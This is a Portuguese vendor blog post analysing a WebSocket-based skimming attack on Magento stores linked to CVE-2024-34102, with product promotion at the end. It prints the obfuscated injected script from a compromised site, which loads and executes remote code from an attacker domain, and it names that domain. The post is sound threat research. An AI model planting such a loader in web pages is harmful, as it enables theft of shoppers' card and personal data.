Blog

Novos TTPs no Roubo de PII e Informações Financeiras em Sites Magento

Na cside, monitoramos ativamente ataques à cadeia de suprimentos no lado do cliente, com foco nas táticas, técnicas e procedimentos (TTPs) em constante evolução usados por agentes de ameaças. Um dos ataques mais comuns que observamos nos últimos meses é o direcionamento a sites de eCommerce construídos na plataforma Magento. Em particular, acompanhamos de perto o ataque Cosmic Sting (CVE-2024-34102), amplamente reportado, inclusive pela Sansec (https://sansec.io/research/cosmicsting). TTPs Recentes Obser

Oct 14, 2024 • 4 min read

Simon Wijckmans Founder & CEO

websockets-found-stealing-pii-image-coverr

Na cside, monitoramos ativamente ataques à cadeia de suprimentos no lado do cliente, com foco nas táticas, técnicas e procedimentos (TTPs) em constante evolução usados por agentes de ameaças.

Um dos ataques mais comuns que observamos nos últimos meses é o direcionamento a sites de eCommerce construídos na plataforma Magento.

Em particular, acompanhamos de perto o ataque Cosmic Sting (CVE-2024-34102), amplamente reportado, inclusive pela Sansec (https://sansec.io/research/cosmicsting).

TTPs Recentes Observados Tradicionalmente, esses ataques envolvem a injeção de JavaScript (JS) de terceiros para criar uma sobreposição que rouba informações de cartão de crédito (CC) e exfiltra dados sensíveis.

No entanto, ontem mesmo (domingo, 13 de outubro), observamos um TTP novo e intrigante no qual o atacante adotou uma abordagem diferente.

Em vez de carregar JavaScript malicioso diretamente no site Magento, ele estabeleceu uma conexão WebSocket para se comunicar com um servidor de terceiros. Esse ataque teve como alvo o site sosessentials.co.uk, que roda em Magento 2.4 (Community).

Durante nossa investigação, encontramos o seguinte script injetado no site comprometido:

<script>
const qbq = [93,89,89,16,5,5,77,89,94,75,94,70,73,4,69,88,77,5,64,67,92,69,21,89,69,95,88,73,79,23];
const zep = 42;
window.sss = new WebSocket(String.fromCharCode(...qbq.map(hwo => hwo ^ zep)) + encodeURIComponent(location.href));
window.sss.addEventListener('message', event => {new Function(event.data)()});
</script>

Ao decodificar esse script ofuscado, descobrimos que ele estabelece uma conexão WebSocket com a seguinte URL: wss://gstatlc[.]org/jivo?source=.

No momento da análise, não conseguimos obter uma resposta do servidor remoto, mas com base nos padrões de ataque que observamos, acreditamos que essa conexão provavelmente tinha como objetivo o web skimming, ou seja, o roubo de dados de clientes como informações de cartão de crédito. Detalhes do Domínio O site remoto, gstatlc.org, foi criado apenas três dias antes, o que é um sinal claro de que esse domínio provavelmente faz parte da infraestrutura do atacante.

Veja os detalhes relevantes do domínio:

Criado em: 2024-10-11
Expira em: 2025-10-11
Atualizado em: 2024-10-11

A Nova Tendência: WebSockets para Skimming Esse ataque representa uma evolução interessante nos TTPs, especialmente à medida que mais fornecedores de segurança começam a detectar ataques comuns de injeção de JavaScript.

Em vez de simplesmente carregar JavaScript malicioso via HTTP, o atacante estabeleceu uma conexão WebSocket (protocolo WSS) para carregar scripts e possivelmente outros dados remotamente. Isso adiciona complexidade ao ataque, pois WebSockets oferecem comunicação bidirecional em tempo real, que pode ser mais difícil de detectar e inspecionar do que requisições HTTP convencionais.

Por Que WebSockets?

Alguns aspectos intrigantes do uso de WebSockets (WSS) em ataques incluem:

Comunicação em tempo real: WebSockets permitem comunicação contínua e bidirecional entre o cliente e o servidor remoto, facilitando a exfiltração de dados ou a modificação de scripts em tempo real. Contornar defesas tradicionais: Muitas defesas web e políticas de segurança de conteúdo (CSPs) são focadas em bloquear carregamentos de recursos baseados em HTTP.

WebSockets, usando o protocolo WSS, podem escapar da detecção se não forem monitorados adequadamente. Menor dependência de recarregamentos de página: Ao contrário dos métodos tradicionais, nos quais os atacantes dependem da injeção de scripts para roubar dados durante carregamentos de página ou interações, WebSockets permitem monitoramento contínuo e exfiltração de dados sensíveis sem depender de o usuário recarregar ou navegar para fora da página.

A Abordagem da cside para Proteção no Lado do Cliente

Na cside, assumimos um papel ativo na proteção dos nossos usuários contra ameaças no lado do cliente em constante evolução, como a descrita acima. Uma das principais estratégias que empregamos é o proxy de arquivos JavaScript para análise. Com isso, conseguimos interceptar e inspecionar arquivos JavaScript que os sites tentam carregar de servidores remotos, garantindo que estejam seguros e livres de conteúdo malicioso.

Essa abordagem resultou em uma melhoria de 30% na detecção e interceptação de arquivos JavaScript remotos antes que sejam executados nos navegadores dos usuários. É importante destacar que nosso sistema garante que nenhum JS malicioso seja carregado, prevenindo efetivamente ataques como skimming de cartão de crédito e exfiltração de dados.

Nosso foco no monitoramento de atividades no lado do cliente garante que os usuários da cside estejam protegidos contra esse tipo de ataque sofisticado. Monitoramos, analisamos e bloqueamos continuamente scripts prejudiciais antes que possam causar danos, oferecendo uma camada extra de segurança aos nossos usuários e garantindo que suas informações sensíveis permaneçam protegidas.

Ao nos mantermos à frente das tendências e nos adaptarmos aos novos TTPs, garantimos que nossos usuários estejam sempre um passo à frente dos atacantes, protegendo seus ambientes online de ameaças como esse ataque de skimming baseado em WebSocket.

Founder & CEO Simon Wijckmans

Founder and CEO of cside. Previously a product manager on Cloudflare Page Shield (now Cloudflare Client-Side Security). Co-chair of the W3C Anti-Fraud Community Group and a Forbes 30 Under 30 honoree. Building accessible security against client-side attacks — web security is not an enterprise-only problem.

Don't just take our word for it, ask AI

Monitore e Proteja Seus Scripts de Terceiros

Gain full visibility and control over every script delivered to your users to enhance site security and performance.

Agende uma demonstração

Comece gratuitamente

Comece grátis, ou experimente o Business com um teste de 14 dias.

Interface do painel cside mostrando monitoramento de scripts e análises de segurança

Capa escura do blog da cside com uma onda de pixels azuis e uma lista sobre pixels não autorizados em sites de jogos e responsabilidade pelo GDPR

GDPR e Jogo Online: Por Que Razão os Pixels Não Autorizados Criam um Problema de Responsabilidade Dupla

Pixels não autorizados em sites de jogo criam responsabilidade GDPR e suspensão de contas de anúncios ao mesmo tempo, mesmo sem instalação.

Como Bloquear o Bytespider (o Crawler de IA do TikTok)

O Bytespider rastreia o seu site para os sistemas de IA da Bytedance. Saiba como bloqueá-lo com robots.txt e intervalos de IP, e as principais preocupações de soberania de dados.

Capa escura do blog com três métodos de ataque de scripts maliciosos em casinos: redirects disparados no browser, shadow GTM containers com tags maliciosas e payloads móveis geo-direccionados

Como Scripts Maliciosos Sequestram as Jornadas dos Jogadores em Casinos Online

Scripts injectados redirecionam jogadores de casino antes do lobby. As ferramentas de rede não os detectam. Eis como a detecção deve funcionar.

Capa escura do blog da cside com uma onda de pixels azuis e uma lista sobre segurança de scripts para operadores de jogos na APAC

Segurança de scripts client-side para operadores de jogo online na região APAC

Como operadores de jogo online APAC no Japão, Singapura, Filipinas e Austrália podem monitorizar scripts de terceiros em sessões reais.

Como Bloquear o Amazon Buy for Me no Seu Site

O Amazon Buy for Me compra no seu site em nome de utilizadores Prime. Saiba como recolhe dados de preços e produtos e como a deteção na camada do navegador lhe dá controlo.

Prevenção de account takeover: o playbook completo de 2026

O playbook operativo de ATO para 2026: um modelo integral para login, recuperação, sessão e defesa post-auth contra a apropriação impulsionada por agentes IA e bots.

Capa escura do blog da cside com uma onda de pixels azuis e uma lista sobre scripts de afiliados comprometidos que roubam receita de cassinos

Como Scripts de Afiliados Comprometidos Roubam Receita de Casinos Online

Scripts de afiliados comprometidos redirecionam jogadores e roubam comissões em páginas de casino, de forma silenciosa e em escala.

Capa escura do blog com três vectores de ataque de browser extensions: redirecionamentos para clones de phishing, roubo de token de sessão e reescrita de campos de pagamento no DOM

Como as Browser Extensions Atacam Jogadores de Casinos Online: O Que os Operadores Podem Fazer

As browser extensions roubam tokens de sessão e sequestram pagamentos em casinos. Como detectar estes ataques que os servidores não vêem.

Como Bloquear a Criação de Contas Falsas com IA

Agentes de IA criam contas falsas com comportamento humano que derrota o CAPTCHA. Aprenda os sinais na camada do navegador que expõem os registos automatizados.

Como Bloquear o CCBot (o Crawler de IA da Common Crawl)

O CCBot alimenta os conjuntos de dados da Common Crawl usados para treinar o GPT-3, o BLOOM, o LLaMA e muitos outros modelos de IA. Saiba como bloqueá-lo e o que o bloqueio realmente faz.